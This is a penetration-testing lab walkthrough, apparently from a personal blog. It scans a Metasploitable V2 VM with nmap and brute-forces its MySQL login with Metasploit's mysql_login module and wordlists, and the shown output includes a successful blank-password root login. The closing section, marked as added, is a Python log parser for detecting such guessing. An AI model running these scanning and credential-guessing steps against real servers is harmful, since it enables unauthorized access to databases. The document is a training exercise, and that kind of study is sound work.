나만의 연습장
Remote MySQL Login Attempt Using a Dictionary File
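!!!WARNING!!!
This post contains information about hacking techniques.
Misusing it may lead to legal problems,
and the author accepts no responsibility whatsoever for incidents caused by attacks.
Viewing this page is regarded as agreement to these terms.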
■ Lab overview
- Use Metasploit to scan for vulnerabilities.
- Attempt a remote MySQL login using dictionary files.
- Kali Linux
- Metasploitable V2 Linux
1. Check the list of services on the target server (e.g. 192.168.10.134)

```
# nmap -sV 192.168.10.134    /* Metasploitable V2 Server IP: 192.168.10.134 */
```

```
root@kali:~# nmap -sV 192.168.10.134
Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-04 23:12 KST
Nmap scan report for 192.168.10.134
Host is up (0.0024s latency).
Not shown: 977 closed ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp   open  telnet      Linux telnetd
25/tcp   open  smtp        Postfix smtpd
53/tcp   open  domain      ISC BIND 9.4.2
80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp  open  rpcbind     2 (RPC #100000)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
512/tcp  open  exec        netkit-rsh rexecd
513/tcp  open  login       OpenBSD or Solaris rlogind
514/tcp  open  tcpwrapped
1099/tcp open  rmiregistry GNU Classpath grmiregistry
1524/tcp open  bindshell   Metasploitable root shell
2049/tcp open  nfs         2-4 (RPC #100003)
2121/tcp open  ftp         ProFTPD 1.3.1
3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5
5432/tcp open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open  vnc         VNC (protocol 3.3)
6000/tcp open  X11         (access denied)
6667/tcp open  irc         UnrealIRCd
8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
8180/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
MAC Address: 00:0C:29:97:EB:EF (VMware)
Service Info: Hosts: metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.73 seconds
```
2. Attempt a MySQL login using the mysql_login auxiliary module in msfconsole

```
# msfconsole
msf > search mysql_login

Matching Modules
================

   Name                                 Disclosure Date  Rank    Check  Description
   ----                                 ---------------  ----    -----  -----------
   auxiliary/scanner/mysql/mysql_login                   normal  Yes    MySQL Login Utility

msf > use auxiliary/scanner/mysql/mysql_login
msf auxiliary(scanner/mysql/mysql_login) > show options

Module options (auxiliary/scanner/mysql/mysql_login):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BLANK_PASSWORDS   false            no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false            no        Try each user/password couple stored in the
   DB_ALL_PASS       false            no        Add all passwords in the current database to the list
   DB_ALL_USERS      false            no        Add all users in the current database to the list
   PASSWORD                           no        A specific password to authenticate with
   PASS_FILE                          no        File containing passwords, one per line
   Proxies                            no        A proxy chain of format type:host:port [,type:host:port][...]
   RHOSTS                             yes       The target address range or CIDR identifier
   RPORT             3306             yes       The target port (TCP)
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   THREADS           1                yes       The number of concurrent threads
   USERNAME                           no        A specific username to authenticate as
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false            no        Try the username as the password for all users
   USER_FILE                          no        File containing usernames, one per line
   VERBOSE           true             yes       Whether to print output for all attempts

msf auxiliary(scanner/mysql/mysql_login) > set RHOSTS 192.168.10.134
RHOSTS => 192.168.10.134
msf auxiliary(scanner/mysql/mysql_login) > run

[+] 192.168.10.134:3306 - 192.168.10.134:3306 - Found remote MySQL version 5.0.51a
[*] Error: 192.168.10.134: Metasploit::Framework::LoginScanner::Invalid Cred details can't be blank, Cred details can't be blank (Metasploit::Framework::LoginScanner::MySQL)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

[TERM2] In another window, create the user.txt and pass.txt files

```
# cd /usr/share/metasploit-framework/data/wordlists
# vi user.txt
root
admin
administrator

# echo "" > pass.txt
# -> On Metasploitable V2, the root user has no password.
```

```
msf auxiliary(scanner/mysql/mysql_login) > set USER_FILE /usr/share/metasploit-framework/data/wordlists/user.txt
USER_FILE => /usr/share/metasploit-framework/data/wordlists/user.txt
msf auxiliary(scanner/mysql/mysql_login) > set PASS_FILE /usr/share/metasploit-framework/data/wordlists/pass.txt
PASS_FILE => /usr/share/metasploit-framework/data/wordlists/pass.txt
msf auxiliary(scanner/mysql/mysql_login) > run

[+] 192.168.10.134:3306 - 192.168.10.134:3306 - Found remote MySQL version 5.0.51a
[-] 192.168.10.134:3306 - 192.168.10.134:3306 - LOGIN FAILED: admin: (Incorrect: Access denied for user 'admin'@'192.168.10.50' (using password: NO))
[-] 192.168.10.134:3306 - 192.168.10.134:3306 - LOGIN FAILED: administrator: (Incorrect: Access denied for user 'administrator'@'192.168.10.50' (using password: NO))
[+] 192.168.10.134:3306 - 192.168.10.134:3306 - Success: 'root:'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/mysql/mysql_login) > quit
```
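Seen from the server side, the run above leaves a recognizable pattern: one client failing logins for several different account names, all with `using password: NO`. The Python sketch below is an added example, not part of the original post; it assumes failed logins are written to the MySQL error log in the 5.7-style line format of the constructed sample, and `min_users` is a hypothetical threshold.

```python
import re
from collections import defaultdict

# Constructed sample lines (assumed MySQL 5.7-style error-log format; the
# "Access denied" text mirrors the messages shown in the session above).
SAMPLE_LOG = """\
2018-11-04T14:20:01.101Z 41 [Note] Access denied for user 'admin'@'192.168.10.50' (using password: NO)
2018-11-04T14:20:01.334Z 42 [Note] Access denied for user 'administrator'@'192.168.10.50' (using password: NO)
2018-11-04T14:25:10.900Z 43 [Note] Access denied for user 'app'@'192.168.10.77' (using password: YES)
2018-11-04T14:26:00.000Z 44 [Note] Aborted connection 44 to db: 'unconnected' user: 'app'
"""

DENIED = re.compile(
    r"Access denied for user '(?P<user>[^']*)'@'(?P<host>[^']*)' "
    r"\(using password: (?P<pw>YES|NO)\)"
)

def summarize_failures(log_text):
    """Group failed logins by client host: attempts, usernames, blank-password tries."""
    stats = defaultdict(lambda: {"attempts": 0, "users": set(), "blank": 0})
    for line in log_text.splitlines():
        m = DENIED.search(line)
        if not m:
            continue  # not a failed-login line
        s = stats[m["host"]]
        s["attempts"] += 1
        s["users"].add(m["user"])
        if m["pw"] == "NO":
            s["blank"] += 1  # client sent no password at all
    return dict(stats)

def flag_guessing(log_text, min_users=2):
    """Return hosts that failed logins for at least min_users distinct accounts.

    min_users is a hypothetical threshold; tune it to the environment.
    """
    return sorted(
        host for host, s in summarize_failures(log_text).items()
        if len(s["users"]) >= min_users
    )

if __name__ == "__main__":
    summary = summarize_failures(SAMPLE_LOG)
    for host in flag_guessing(SAMPLE_LOG):
        s = summary[host]
        print(f"{host}: {s['attempts']} failures, users={sorted(s['users'])}, "
              f"blank-password attempts={s['blank']}")
```

The successful blank-password `root` login from the session would not appear among these failure lines, so the lasting fix is to set a password for `root` and remove its remote-host grants rather than to rely on detection alone.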